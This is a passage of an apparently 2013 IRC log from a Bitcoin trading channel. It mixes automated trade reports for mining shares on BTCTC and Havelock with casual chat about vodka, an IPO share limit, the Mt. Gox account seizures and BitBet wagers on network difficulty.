22 17:23:07 [BTCTC] [ASICMINER-PT] 1 @ 3.128 BTC [+] Aug 22 17:23:09 [BTCTC] [ASICMINER-PT] 2 @ 3.129 = 6.258 BTC [+] Aug 22 17:23:20 you merrican? Aug 22 17:23:22 [BTCTC] [DMS.MINING] 30 @ 0.003298 = 0.0989 BTC [+] Aug 22 17:23:22 that's because you go to work Aug 22 17:23:28 where there are other sheeple Aug 22 17:23:35 then you merge with them Aug 22 17:23:36 gecko_x2 he's not started drinking professionally yet :D Aug 22 17:23:39 and become a sheeple Aug 22 17:23:51 oh, ic :p Aug 22 17:23:55 right Aug 22 17:24:21 nah really dun wanna disturb Aug 22 17:24:30 was p all night wathing the tape Aug 22 17:24:36 up* Aug 22 17:24:55 now too tired to think, downed 4 large french beers Aug 22 17:24:55 [BTCTC] [S.MPOE-PT] 1 @ 0.0008332 BTC [-] Aug 22 17:25:05 now working on a bottle of jacob's creek Aug 22 17:25:11 after that.. sleep Aug 22 17:25:28 for the last time.. nite peeps :p Aug 22 17:25:28 [BTCTC] [BASIC-MINING] 1 @ 0.2672 BTC [+] Aug 22 17:25:34 sure sure Aug 22 17:25:37 :D Aug 22 17:26:22 This is how you I picture you, http://upload.wikimedia.org/wikipedia/en/thumb/a/a6/Bender_Rodriguez.png/220px-Bender_Rodriguez.png Aug 22 17:26:56 the cig would be a thin white marihuana smoke Aug 22 17:27:02 i'm an expert hand roller Aug 22 17:27:08 and i smoke extensively Aug 22 17:27:11 Single handed? Aug 22 17:27:12 pot and tobacco Aug 22 17:27:19 not quite, yet Aug 22 17:27:26 Then you're pro just yet Aug 22 17:27:27 only the norwegians roll with one hand Aug 22 17:27:30 you're no* Aug 22 17:27:36 that's correct Aug 22 17:27:45 but i do roll and fast Aug 22 17:27:50 just need 2 hands Aug 22 17:28:05 and i drink, i know vodka's Aug 22 17:28:16 but normally i stick to white wine and some beer Aug 22 17:28:25 I'm a Vodka/Whisky drinker, but mainly beer. Aug 22 17:28:41 well i know the best vodka in the world Aug 22 17:28:42 http://t1.gstatic.com/images?q=tbn:ANd9GcSPiep73CcCrHxh79sj3NglHrjslKm6t6a-Q8etBLIlD3OdvIjwNw Aug 22 17:28:48 and it all comes from ukraine Aug 22 17:28:48 i havent had a drink since romania Aug 22 17:28:53 NO hangover Aug 22 17:28:55 NONE Aug 22 17:29:02 Give me an example Aug 22 17:29:05 no matter how much u had Aug 22 17:29:08 I'll see if I can pick some up Aug 22 17:29:17 Mernaya Aug 22 17:29:46 about 7 EUR per 0.5 litre Aug 22 17:29:51 gecko_x2 rthat's a property of all good spirits (ie, not industrially produced crap) Aug 22 17:29:53 i guarantee no hangover Aug 22 17:30:11 I'll buy a bottle Aug 22 17:30:21 Cheap Aug 22 17:30:24 http://www.bernkastelvintners.com/ukrainedist.html Aug 22 17:30:27 Ukraine/Mernaya Vodka Aug 22 17:30:30 it's like nothing you ever tried Aug 22 17:30:30 a busienss is born. Aug 22 17:30:34 That's what I'm looking at right now actually Aug 22 17:30:36 gecko_x2 start importing alcohols for btc Aug 22 17:30:46 russian standard etc is nothing but kids play compared Aug 22 17:30:48 You would probably get all my btcs Aug 22 17:31:11 you wake up in the morning after downing a litre of that Aug 22 17:31:23 you feel liek you been drinking water last night Aug 22 17:31:28 and i'm not kidding. Aug 22 17:31:29 AHH lame Aug 22 17:31:33 I can't ship to GA Aug 22 17:31:37 its all placebo Aug 22 17:31:44 nope Aug 22 17:31:50 i promise you it ain't :) Aug 22 17:32:21 [BTCTC] [TAT.ASICMINER] 4 @ 0.03018 = 0.1207 BTC [-] Aug 22 17:32:22 [BTCTC] [TAT.ASICMINER] 3 @ 0.03019 = 0.0906 BTC [+] Aug 22 17:32:38 anyways there are a few other very very cheap ukrainian brands, but i can't recall the letters right now :D Aug 22 17:32:51 Well make a list and tell me later then Aug 22 17:32:54 but i tell you, ukrainian is the shiet Aug 22 17:32:59 i dunno what they do Aug 22 17:33:05 but it's unreal. Aug 22 17:33:08 I do enjoy trying new vodkas Aug 22 17:33:14 k Aug 22 17:33:26 [BTCTC] [ASICMINER-PT] 1 @ 3.061 BTC [-] Aug 22 17:33:28 Rulother the list won't be long Aug 22 17:33:42 [BTCTC] [TAT.ASICMINER] 67 @ 0.03021 = 2.0241 BTC [+] Aug 22 17:33:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.03022 = 0.0907 BTC [+] Aug 22 17:33:45 Hey easier, to complete then Aug 22 17:33:45 [BTCTC] [TAT.ASICMINER] 30 @ 0.03023 = 0.9069 BTC [+] Aug 22 17:33:46 as i said i tried everything.. the expensive shit is just crap mostly Aug 22 17:33:52 [BTCTC] [BASIC-MINING] 1 @ 0.2749 BTC [+] Aug 22 17:33:52 but when u go ukrainian Aug 22 17:34:06 and i've live in tallinn estonia for about 10 years Aug 22 17:34:08 i tell you Aug 22 17:34:17 you never knew vodka like that Aug 22 17:34:23 this explains eskimo bob. Aug 22 17:34:39 [BTCTC] [LABCOIN] 85 @ 0.002268 = 0.1928 BTC [+] Aug 22 17:34:49 ok, now i'll try to sleep again Aug 22 17:34:59 after some wine and a smoke :) Aug 22 17:35:02 happy trading Aug 22 17:35:08 nite Aug 22 17:35:11 Good night Aug 22 17:36:53 [BTCTC] [ASICMINER-PT] 1 @ 3.06 BTC [-] Aug 22 17:38:09 [HAVELOCK] [XBOND] 1 @ 0.00114499 BTC [+] Aug 22 17:38:41 [BTCTC] [LABCOIN] 30 @ 0.002269 = 0.0681 BTC [+] Aug 22 17:47:46 [HAVELOCK] [XBOND] 1 @ 0.00114499 BTC [+] Aug 22 17:47:57 [HAVELOCK] [XBOND] 10 @ 0.00114499 = 0.0114 BTC [+] Aug 22 17:48:10 [HAVELOCK] [XBOND] 4 @ 0.00114499 = 0.0046 BTC [+] Aug 22 17:50:20 [BTCTC] [LABCOIN] 129 @ 0.002269 = 0.2927 BTC [+] Aug 22 17:53:46 [BTCTC] [DMS.MINING] 516 @ 0.003298 = 1.7018 BTC [+] Aug 22 17:53:46 [BTCTC] [DMS.MINING] 2 @ 0.003299 = 0.0066 BTC [+] Aug 22 17:56:39 [BTCTC] [LABCOIN] 2204 @ 0.002269 = 5.0009 BTC [+] Aug 22 18:03:48 [BTCTC] [LABCOIN] 1240 @ 0.002269 = 2.8136 BTC [+] Aug 22 18:10:42 who owns s.dice now? Aug 22 18:10:57 [BTCTC] [TAT.ASICMINER] 67 @ 0.02944 = 1.9725 BTC [-] Aug 22 18:13:33 [HAVELOCK] [AM100] 2 @ 0.03089 = 0.0618 BTC [+] Aug 22 18:13:47 [BTCTC] [TAT.ASICMINER] 67 @ 0.02987 = 2.0013 BTC [+] Aug 22 18:13:47 [BTCTC] [TAT.ASICMINER] 50 @ 0.02988 = 1.494 BTC [+] Aug 22 18:14:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.02943 BTC [-] Aug 22 18:14:05 [BTCTC] [TAT.ASICMINER] 23 @ 0.02941 = 0.6764 BTC [-] Aug 22 18:14:07 [BTCTC] [BTC-TRADING-PT] 2 @ 0.8555 = 1.711 BTC [+] Aug 22 18:14:55 [HAVELOCK] [AM1] 1 @ 3.17 BTC [-] Aug 22 18:15:01 [HAVELOCK] [AM1] 4 @ 3.18 = 12.72 BTC [+] Aug 22 18:16:29 Ozymandias_ wasn't discolsed. Aug 22 18:16:56 https://www.youtube.com/watch?v=SPjuuLKsGbM Aug 22 18:16:58 The Gathering - Mandylion ( Full Album ) - YouTube Aug 22 18:17:11 Thought you were going to sleep Aug 22 18:17:16 i am Aug 22 18:17:21 :p Aug 22 18:18:05 sleep? Aug 22 18:18:09 whats that Aug 22 18:18:13 It has always been in the back of my mind Aug 22 18:18:13 Dreaming about going to the corners of time Aug 22 18:18:13 I always wanted to fly in strange machines Aug 22 18:18:43 o_O Aug 22 18:19:13 Don't worry, he's just drunk. Aug 22 18:19:32 it's 6 pm Aug 22 18:19:44 [BTCTC] [DMS.MINING] 20 @ 0.00339 = 0.0678 BTC [+] Aug 22 18:19:51 could not sleep last night at all.. rythm all messed up Aug 22 18:20:05 made an effort today to extend Aug 22 18:20:16 so i could get some kind of ruthm back Aug 22 18:20:21 [BTCTC] [DMS.MINING] 10 @ 0.00339 = 0.0339 BTC [+] Aug 22 18:20:21 rythm* Aug 22 18:20:50 so i'm now drunk and sleep deprived :p Aug 22 18:21:02 just loaded up on my fav album Aug 22 18:21:06 and posted :p Aug 22 18:21:26 if i make it another 5 hours.. i should get to some kind of normalcy Aug 22 18:22:09 Doubtful Aug 22 18:22:26 i need AM to go back to 3.6 Aug 22 18:22:35 [BTCTC] [ASICMINER-PT] 1 @ 3.052 BTC [-] Aug 22 18:22:37 and actm to dip back to 5 Aug 22 18:22:40 Being sleep deprived can make your body seem drunk Aug 22 18:22:47 to make a small profit Aug 22 18:22:49 "Sisters Penny and Jane Lowe are arrested for hitchhiking and skinny dipping and are sentenced to work on a rural farm for a corrupt agricultural magnate named Tropp." Aug 22 18:22:52 [BTCTC] [TAT.ASICMINER] 67 @ 0.02978 = 1.9953 BTC [+] Aug 22 18:22:54 [BTCTC] [TAT.ASICMINER] 4 @ 0.02979 = 0.1192 BTC [+] Aug 22 18:22:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.02999 = 0.06 BTC [+] Aug 22 18:22:56 [BTCTC] [TAT.ASICMINER] 28 @ 0.03 = 0.84 BTC [+] Aug 22 18:23:24 Hmmm Aug 22 18:23:34 Sounds like the show "The Simple Life" that was on years ago Aug 22 18:23:53 some mamie van doren exploitation Aug 22 18:24:38 [BTCTC] [LABCOIN] 21 @ 0.002269 = 0.0476 BTC [+] Aug 22 18:24:53 [BTCTC] [ASICMINER-PT] 1 @ 3.052 BTC [-] Aug 22 18:25:03 [BTCTC] [TAT.ASICMINER] 67 @ 0.02997 = 2.008 BTC [-] Aug 22 18:25:04 [BTCTC] [TAT.ASICMINER] 6 @ 0.02998 = 0.1799 BTC [+] Aug 22 18:25:06 [BTCTC] [TAT.ASICMINER] 28 @ 0.02999 = 0.8397 BTC [+] Aug 22 18:25:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.02999 BTC [+] Aug 22 18:27:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.02998 = 0.0899 BTC [-] Aug 22 18:30:02 [BTCTC] [ASICMINER-PT] 1 @ 3.051 BTC [-] Aug 22 18:30:04 [BTCTC] [ASICMINER-PT] 1 @ 3.05 BTC [-] Aug 22 18:30:05 [BTCTC] [ASICMINER-PT] 1 @ 3.03 BTC [-] Aug 22 18:30:06 [BTCTC] [ASICMINER-PT] 1 @ 3.02 BTC [-] Aug 22 18:30:08 [BTCTC] [ASICMINER-PT] 1 @ 3.015 BTC [-] Aug 22 18:30:08 [BTCTC] [ASICMINER-PT] 2 @ 3.007 = 6.014 BTC [-] Aug 22 18:30:15 [BTCTC] [ASICMINER-PT] 3 @ 3.006 = 9.018 BTC [-] Aug 22 18:30:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.02923 BTC [-] Aug 22 18:31:26 [BTCTC] [BASIC-MINING] 1 @ 0.2671 BTC [-] Aug 22 18:31:28 [BTCTC] [BASIC-MINING] 1 @ 0.2651 BTC [-] Aug 22 18:31:30 [BTCTC] [BASIC-MINING] 2 @ 0.265 = 0.53 BTC [-] Aug 22 18:31:31 [BTCTC] [BASIC-MINING] 5 @ 0.265 = 1.325 BTC [-] Aug 22 18:31:32 [BTCTC] [BASIC-MINING] 2 @ 0.2539 = 0.5078 BTC [-] Aug 22 18:31:33 [BTCTC] [BASIC-MINING] 5 @ 0.2537 = 1.2685 BTC [-] Aug 22 18:31:35 [BTCTC] [BASIC-MINING] 14 @ 0.2536 = 3.5504 BTC [-] Aug 22 18:31:38 .d Aug 22 18:31:38 50810339.04828 | Next Diff in 386 blocks | Estimated Change: 27.4618% in 1d 22h 25m 34s **** BEGIN LOGGING AT Thu Aug 22 18:55:21 2013 Aug 22 18:58:16 [HAVELOCK] [AM100] 3 @ 0.0309 = 0.0927 BTC [+] Aug 22 19:03:59 [BTCTC] [DMS.MINING] 1 @ 0.003389 BTC [-] Aug 22 19:05:02 [BTCTC] [ASICMINER-PT] 1 @ 3.001 BTC [-] Aug 22 19:05:03 [BTCTC] [ASICMINER-PT] 1 @ 3.001 BTC [-] Aug 22 19:05:05 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [-] Aug 22 19:05:18 [BTCTC] [ASICMINER-PT] 7 @ 3 = 21 BTC [-] Aug 22 19:05:19 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [-] Aug 22 19:05:21 [BTCTC] [ASICMINER-PT] 3 @ 3 = 9 BTC [-] Aug 22 19:05:22 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [-] Aug 22 19:08:49 [BTCTC] [DMS.MINING] 13 @ 0.003389 = 0.0441 BTC [-] Aug 22 19:18:40 [BTCTC] [TAT.ASICMINER] 67 @ 0.03016 = 2.0207 BTC [+] Aug 22 19:18:41 [BTCTC] [TAT.ASICMINER] 23 @ 0.03015 = 0.6935 BTC [-] Aug 22 19:18:42 [BTCTC] [TAT.ASICMINER] 36 @ 0.03012 = 1.0843 BTC [-] Aug 22 19:20:34 [BTCTC] [TAT.ASICMINER] 25 @ 0.03015 = 0.7538 BTC [+] Aug 22 19:21:22 [BTCTC] [DMS.MINING] 1 @ 0.003389 BTC [-] Aug 22 19:25:59 [BTCTC] [TAT.ASICMINER] 7 @ 0.03092 = 0.2164 BTC [+] Aug 22 19:29:09 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [-] Aug 22 19:29:10 [BTCTC] [ASICMINER-PT] 1 @ 2.99 BTC [-] Aug 22 19:35:34 [HAVELOCK] [XBOND] 50 @ 0.00114499 = 0.0572 BTC [+] Aug 22 19:37:57 [BTCTC] [BTC-GROWTH] 7 @ 0.0998 = 0.6986 BTC [+] Aug 22 19:37:58 [BTCTC] [BTC-GROWTH] 234 @ 0.1 = 23.4 BTC [+] Aug 22 19:38:50 [HAVELOCK] [CFIG] 204 @ 0.15 = 30.6 BTC Aug 22 19:39:47 [BTCTC] [TAT.ASICMINER] 15 @ 0.03077 = 0.4616 BTC [-] Aug 22 19:42:46 [HAVELOCK] [XBOND] 3 @ 0.00114499 = 0.0034 BTC [+] Aug 22 19:43:53 [BTCTC] [DMS.MINING] 95 @ 0.003389 = 0.322 BTC [-] Aug 22 19:48:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.03069 BTC [-] Aug 22 19:49:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.03069 BTC [-] Aug 22 19:49:25 [BTCTC] [ACTIVEMINING] 68 @ 0.005254 = 0.3573 BTC [+] Aug 22 19:49:26 [BTCTC] [ACTIVEMINING] 17 @ 0.005255 = 0.0893 BTC [+] Aug 22 19:49:53 [BTCTC] [ASICMINER-PT] 1 @ 3.083 BTC [+] Aug 22 19:50:26 [HAVELOCK] [AM100] 65 @ 0.0309 = 2.0085 BTC [+] Aug 22 19:51:08 ;;nethash Aug 22 19:51:08 521791.860973 Aug 22 19:51:13 [BTCTC] [TAT.ASICMINER] 3 @ 0.03069 = 0.0921 BTC [-] Aug 22 19:54:43 [BTCTC] [ASICMINER-PT] 1 @ 3.084 BTC [+] Aug 22 19:56:07 [HAVELOCK] [XBOND] 8 @ 0.00114499 = 0.0092 BTC [+] Aug 22 19:56:29 [BTCTC] [LABCOIN] 85 @ 0.002264 = 0.1924 BTC [+] Aug 22 19:56:32 [HAVELOCK] [XBOND] 1 @ 0.00114499 BTC [+] Aug 22 19:57:16 [BTCTC] [TAT.ASICMINER] 25 @ 0.0303 = 0.7575 BTC [-] Aug 22 19:58:21 [HAVELOCK] [AM100] 1 @ 0.03089 BTC [-] Aug 22 19:59:37 [BTCTC] [DMS.SELLING] 48 @ 0.0173 = 0.8304 BTC [-] Aug 22 19:59:52 http://finance.yahoo.com/news/nasdaq-trading-halted-due-technical-162926716.html Aug 22 19:59:56 Nasdaq trading halted due to technical issue - Yahoo Finance Aug 22 20:00:17 Did someone try powercycling? Aug 22 20:00:18 :P Aug 22 20:00:22 LOL Aug 22 20:00:58 sell it all! Aug 22 20:01:01 shut it down! Aug 22 20:03:15 .d Aug 22 20:03:18 50810339.04828 | Next Diff in 374 blocks | Estimated Change: 27.3563% in 1d 21h 15m 35s Aug 22 20:05:50 Shut it all down! STOP AL LTHE DOWNLOADING. Aug 22 20:05:55 [HAVELOCK] [CFIG] 3 @ 0.15 = 0.45 BTC Aug 22 20:06:07 CFIG just changes their IPO timeframe. Neat. Aug 22 20:06:12 I guess it doesn't really matter. Aug 22 20:06:19 They're still offering the IPO price for the remainder. Aug 22 20:06:41 Just seems odd. Aug 22 20:07:00 [BTCTC] [ASICMINER-PT] 1 @ 3.084 BTC [+] Aug 22 20:08:49 [BTCTC] [DMS.MINING] 70 @ 0.003389 = 0.2372 BTC [-] Aug 22 20:09:31 [BTCTC] [LABCOIN] 200 @ 0.002269 = 0.4538 BTC [+] Aug 22 20:10:20 [BTCTC] [LABCOIN] 1140 @ 0.002269 = 2.5867 BTC [+] Aug 22 20:11:33 are people even buying shares? Aug 22 20:12:03 there was like almost no purchases the first week or so Aug 22 20:12:36 Yeah. Most of their volume is from private investors. Aug 22 20:12:46 They never even came across the exchange. Aug 22 20:12:49 did CFIG confirm that? Aug 22 20:13:08 otherwise it's possible they simply pushed shares to other accounts Aug 22 20:13:14 of their own Aug 22 20:13:15 [HAVELOCK] [AM100] 4 @ 0.0309 = 0.1236 BTC [+] Aug 22 20:13:39 I don't think anyone asked them to confirm it. Aug 22 20:14:41 [BTCTC] [ASICMINER-PT] 1 @ 3.088 BTC [+] Aug 22 20:14:44 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 22 20:15:15 It is interesting that they have a 20,000 share limit, though. Meaning that each tranche is supposed to be at least 3 buyers. Aug 22 20:15:56 [BTCTC] [BTC-GROWTH] 3 @ 0.1002 = 0.3006 BTC [+] Aug 22 20:16:07 there may not be limits when pushing shares Aug 22 20:16:15 i dont think there are Aug 22 20:16:24 youd have to ask topace Aug 22 20:17:14 share limit is idiotic Aug 22 20:17:57 Are they really going to say, "No!" to someone who wants to purchase 50,000 shares? Aug 22 20:18:16 There's only one way to find out Aug 22 20:18:22 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 22 20:18:24 I elect you kleeck to find out for us Aug 22 20:18:31 :P Aug 22 20:19:04 share limit is idiotic <<< agreed Aug 22 20:19:28 [BTCTC] [LABCOIN] 80 @ 0.002269 = 0.1815 BTC [+] Aug 22 20:19:39 [BTCTC] [ASICMINER-PT] 1 @ 3.085 BTC [-] Aug 22 20:19:40 [BTCTC] [ASICMINER-PT] 1 @ 3.086 BTC [+] Aug 22 20:20:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.03079 BTC [+] Aug 22 20:20:29 [BTCTC] [TAT.ASICMINER] 20 @ 0.03079 = 0.6158 BTC [+] Aug 22 20:20:30 Dear Kleeck, We regret to inform you that your attempt to throw $750,000.00 to our IPO has been denied. We will only accept a maximum of $300,000.00 Regretfully, Dumbass Inc. Aug 22 20:20:51 [BTCTC] [TAT.ASICMINER] 67 @ 0.03026 = 2.0274 BTC [-] Aug 22 20:20:53 [BTCTC] [TAT.ASICMINER] 5 @ 0.03025 = 0.1513 BTC [-] Aug 22 20:20:53 [BTCTC] [TAT.ASICMINER] 15 @ 0.0302 = 0.453 BTC [-] Aug 22 20:20:54 [BTCTC] [TAT.ASICMINER] 3 @ 0.03001 = 0.09 BTC [-] Aug 22 20:20:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.03 BTC [-] Aug 22 20:20:57 [BTCTC] [TAT.ASICMINER] 15 @ 0.03 = 0.45 BTC [-] Aug 22 20:21:27 [HAVELOCK] [AM100] 25 @ 0.0309 = 0.7725 BTC [+] Aug 22 20:21:32 it reminds me of when supermarkets have limits on sale items Aug 22 20:21:36 haha Aug 22 20:21:52 My mom used to make me come with her to get toothpaste cause there was like a 2 per person limit Aug 22 20:21:54 3 per person, you will need to bring your husband if you wish to game us Aug 22 20:22:08 Its the internet man I can be 100 people Aug 22 20:22:20 share limits make sense for the company if there is a board Aug 22 20:22:20 [BTCTC] [ASICMINER-PT] 1 @ 3.088 BTC [+] Aug 22 20:22:36 [HAVELOCK] [AM100] 3 @ 0.03 = 0.09 BTC [-] Aug 22 20:23:05 [BTCTC] [BTC-GROWTH] 8 @ 0.1002 = 0.8016 BTC [+] Aug 22 20:23:17 and as long as demand is high Aug 22 20:23:52 "Matuszed is a million different people from one day to the next. He can change his mold, no, no, no, no, no." Aug 22 20:24:32 Just a little The Verve adaptation for you gentlemen. Aug 22 20:25:14 Which is clearly underappreciated. Aug 22 20:25:42 [HAVELOCK] [AM100] 1 @ 0.0309 BTC [+] Aug 22 20:26:03 Oh neat. CFIG just had another massive purchase. WTF. Aug 22 20:26:16 another 750,000. Aug 22 20:26:38 [BTCTC] [DMS.MINING] 5 @ 0.003389 = 0.0169 BTC [-] Aug 22 20:26:55 [BTCTC] [TAT.ASICMINER] 3 @ 0.03068 = 0.092 BTC [+] Aug 22 20:27:11 [BTCTC] [ACTIVEMINING] 68 @ 0.005386 = 0.3662 BTC [+] Aug 22 20:27:11 [BTCTC] [ACTIVEMINING] 11 @ 0.005387 = 0.0593 BTC [+] Aug 22 20:28:20 [BTCTC] [LABCOIN] 11823 @ 0.002269 = 26.8264 BTC [+] Aug 22 20:28:21 [BTCTC] [LABCOIN] 1500 @ 0.002294 = 3.441 BTC [+] Aug 22 20:28:23 [BTCTC] [LABCOIN] 4500 @ 0.002295 = 10.3275 BTC [+] Aug 22 20:31:02 [HAVELOCK] [CFIG] 500 @ 0.15 = 75 BTC Aug 22 20:32:10 Damn Aug 22 20:34:14 what did that IPO st? Aug 22 20:34:15 at8 Aug 22 20:34:28 [BTCTC] [DMS.MINING] 65 @ 0.003389 = 0.2203 BTC [-] Aug 22 20:35:51 stat8? Aug 22 20:36:13 What are you saying? Aug 22 20:36:15 [HAVELOCK] [CFIG] 500 @ 0.15 = 75 BTC Aug 22 20:36:17 Asking? Aug 22 20:37:28 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 22 20:37:44 I can't type, clearly. Aug 22 20:37:49 what sis CFIG IPO at ? Aug 22 20:37:54 How many left? Aug 22 20:38:11 THat is the IPO, 0.15 Aug 22 20:38:15 They have a total of 200,000 shares. Aug 22 20:38:20 Ah - wasn't sure. I thought it was. Aug 22 20:38:42 Yeah, the market hasn't opened. Aug 22 20:39:33 [BTCTC] [DMS.MINING] 1 @ 0.003389 BTC [-] Aug 22 20:40:25 ThickAsThieves it's a marketing tactic. Aug 22 20:40:37 they want random idiot to bring his friends, random idiots as himself. Aug 22 20:41:53 you know you can't just power cycle a machine with no idea what's going on :D Aug 22 20:42:15 [HAVELOCK] [CFIG] 11 @ 0.15 = 1.65 BTC Aug 22 20:42:49 Sure you can, just hope for the best! Aug 22 20:43:28 it's a funny thing about Windows, in my experience, most problems are either caused or fixed upon reboot Aug 22 20:44:51 it was a quote tho Aug 22 20:44:53 from quux iirc. Aug 22 20:44:56 lemme find it Aug 22 20:45:19 A novice was trying to fix a broken Lisp machine by turning the power off and on. Aug 22 20:45:19 Knight, seeing what the student was doing, spoke sternly: “You cannot fix a machine by just power-cycling it with no understanding of what is going wrong.” Aug 22 20:45:19 Knight turned the machine off and on. Aug 22 20:45:19 The machine worked. Aug 22 20:45:20 there. Aug 22 20:46:02 hah Aug 22 20:47:46 hehe Aug 22 20:48:38 [BTCTC] [DMS.MINING] 6 @ 0.003389 = 0.0203 BTC [-] Aug 22 20:49:40 mircea_popescu: what is the moral to that story? Aug 22 20:49:50 that unplugging the router and plugging it back in always fixes the internet? Aug 22 20:49:56 it's a koan, it doesn't have a moral. Aug 22 20:50:11 but here, have another one : Aug 22 20:50:12 A disciple of another sect once came to Drescher as he was eating his morning meal. Aug 22 20:50:12 “I would like to give you this personality test”, said the outsider, “because I want you to be happy.” Aug 22 20:50:12 Drescher took the paper that was offered him and put it into the toaster, saying: “I wish the toaster to be happy, too.” Aug 22 20:51:06 [BTCTC] [HOSTED-MINING] 2 @ 0.28 = 0.56 BTC [+] Aug 22 20:51:49 [BTCTC] [TAT.ASICMINER] 11 @ 0.03042 = 0.3346 BTC [-] Aug 22 20:52:04 [BTCTC] [TAT.ASICMINER] 10 @ 0.03042 = 0.3042 BTC [-] Aug 22 20:54:13 http://thegenesisblock.com/warrant-for-mt-gox-wells-fargo-accounts-shows-additional-2-1m-seized/ Aug 22 20:54:16 5m total Aug 22 20:55:11 who was asking me for evidence they're running fractional reserve two months ago ? Aug 22 20:55:20 and i said "you'll see in a coupla months" ? Aug 22 20:55:24 “Bank records also show a transfer of $50,0000 in January 2012… to the personal account at Wells Fargo in the name of Mark Karpeles.” Aug 22 20:55:29 so many zeros! Aug 22 20:56:41 [BTCTC] [TAT.ASICMINER] 27 @ 0.03043 = 0.8216 BTC [+] Aug 22 20:56:52 [BTCTC] [DMS.PURCHASE] 2 @ 0.02057 = 0.0411 BTC [-] Aug 22 20:57:33 so 50,000.00 or 500,000? I'm guessing the former Aug 22 20:57:59 half a mil sounds right. Aug 22 20:58:01 [BTCTC] [DMS.MINING] 1625 @ 0.003389 = 5.5071 BTC [-] Aug 22 20:58:08 it's 50k (read the document) Aug 22 20:58:17 [BTCTC] [KENILWORTH] 5 @ 0.001796 = 0.009 BTC [-] Aug 22 20:58:46 i guess teh pizzas be cheap then. Aug 22 21:02:11 [BTCTC] [COGNITIVE] 1 @ 0.287 BTC [-] Aug 22 21:02:12 [BTCTC] [LABCOIN] 74 @ 0.0023 = 0.1702 BTC [+] Aug 22 21:02:13 [BTCTC] [COGNITIVE] 10 @ 0.287 = 2.87 BTC [-] Aug 22 21:02:15 [BTCTC] [COGNITIVE] 6 @ 0.2701 = 1.6206 BTC [-] Aug 22 21:02:23 [BTCTC] [DMS.MINING] 3 @ 0.00339 = 0.0102 BTC [+] Aug 22 21:02:45 [BTCTC] [NASTY-PT] 500 @ 0.001003 = 0.5015 BTC [-] Aug 22 21:03:53 [BTCTC] [TAT.ASICMINER] 35 @ 0.03043 = 1.0651 BTC [+] Aug 22 21:04:49 CoinBr.iDiff-E expires after difficulty reaches 400 000 000, or using current difficulty by 16th of October 2013 Aug 22 21:04:53 [BTCTC] [LABCOIN] 20 @ 0.002323 = 0.0465 BTC [+] Aug 22 21:04:54 [BTCTC] [LABCOIN] 1500 @ 0.002324 = 3.486 BTC [+] Aug 22 21:04:56 [BTCTC] [LABCOIN] 656 @ 0.002325 = 1.5252 BTC [+] Aug 22 21:05:00 400 meeelion, hmmm Aug 22 21:05:06 [HAVELOCK] [VTX] 3 @ 0.561 = 1.683 BTC [-] Aug 22 21:05:55 i saw a bet for 500mn by xmas Aug 22 21:06:14 oh, xmas is sure thing Aug 22 21:06:24 That's a sure bet. Aug 22 21:06:29 What were the odds? Aug 22 21:06:46 [HAVELOCK] [CFIG] 9 @ 0.15 = 1.35 BTC Aug 22 21:06:47 http://bitbet.us/bet/508/btc-network-difficulty-to-top-500mn-before-xmas/ Aug 22 21:06:52 bout 2:! Aug 22 21:06:52 BitBet - BTC network difficulty to top 500MN before Xmas 2013 Aug 22 21:07:07 http://bitbet.us/bet/490/btc-network-difficulty-to-top-69-million-by/ Aug 22 21:07:11 BitBet - BTC network difficulty to top 69 million by end of September Aug 22 21:07:12 69mn by end of sept is like 11:! Aug 22 21:07:30 There's money to be had here Aug 22 21:09:06 ;;nethash Aug 22 21:09:07 523386.080004 Aug 22 21:09:19 .d Aug 22 21:09:20 50810339.04828 | Next Diff in 365 blocks | Estimated Change: 27.4410% in 1d 20h 3m 8s Aug 22 21:10:38 http://bitbet.us/bet/496/btc-network-hashrate-will-exceed-1-000-th-s-before/ Aug 22 21:10:41 BitBet - BTC network hashrate will exceed 1,000 TH/s before December 14th 2013 Aug 22 21:10:43 this is like 3:1 for some reason Aug 22 21:10:55 i guess one could arb the hash and the diff bets Aug 22 21:11:30 Or miners could hedge Aug 22 21:11:33 thats the better use Aug 22 21:11:46 theyre the ones who should be trading those Aug 22 21:12:12 hedge? like, 4btc ? Aug 22 21:12:13 miners are still struggling with eating using forks Aug 22 21:12:18 hedge tools too advanced yet. Aug 22 21:12:24 haha Aug 22 21:12:29 the biggest thing that stops me from bitbetting is small amounts of btc for large amounts of time Aug 22 21:12:35 true Aug 22 21:12:42 there needs to be a market maker Aug 22 21:12:45 ThickAsThieves how do you mean ? Aug 22 21:12:46 willing to step up Aug 22 21:12:50 and do the trades in size Aug 22 21:12:57 like i wanna make bigger bets Aug 22 21:13:00 so make em ? Aug 22 21:13:08 but Aug 22 21:13:10 Its got to be meaningful for a true mining operation Aug 22 21:13:14 but you have nothing to bet against Aug 22 21:13:18 the timeframes are so far away Aug 22 21:13:19 tsk, it covers. looky : Aug 22 21:13:23 that i can make more money elsewhere Aug 22 21:13:58 Its need s aliquid exchange Aug 22 21:14:08 like a real futures exchange with some capital behind it Aug 22 21:14:10 more liquid than nasdaq right now Aug 22 21:14:13 even btct could do it Aug 22 21:14:19 hehe Aug 22 21:14:20 just needs more interest Aug 22 21:14:29 lol nasdaq. Aug 22 21:14:30 they would need aMUCH better engine than what they've got now Aug 22 21:14:39 looks like gox is not the only exchange to fuck up Aug 22 21:14:40 and more people willing to put their skin in Aug 22 21:15:16 ThickAsThieves in principle there's not much keeping you from making any bets you want, two weeks, a week, w/e. Aug 22 21:15:23 and from ewxperuience large bets get covered. Aug 22 21:15:40 true Aug 22 21:15:45 i will add this to the list... Aug 22 21:15:52 http://bitbet.us/bet/495/there-will-be-blood/#c1168 Aug 22 21:15:55 BitBet - There will be blood Aug 22 21:15:58 point in case. ppl know by now 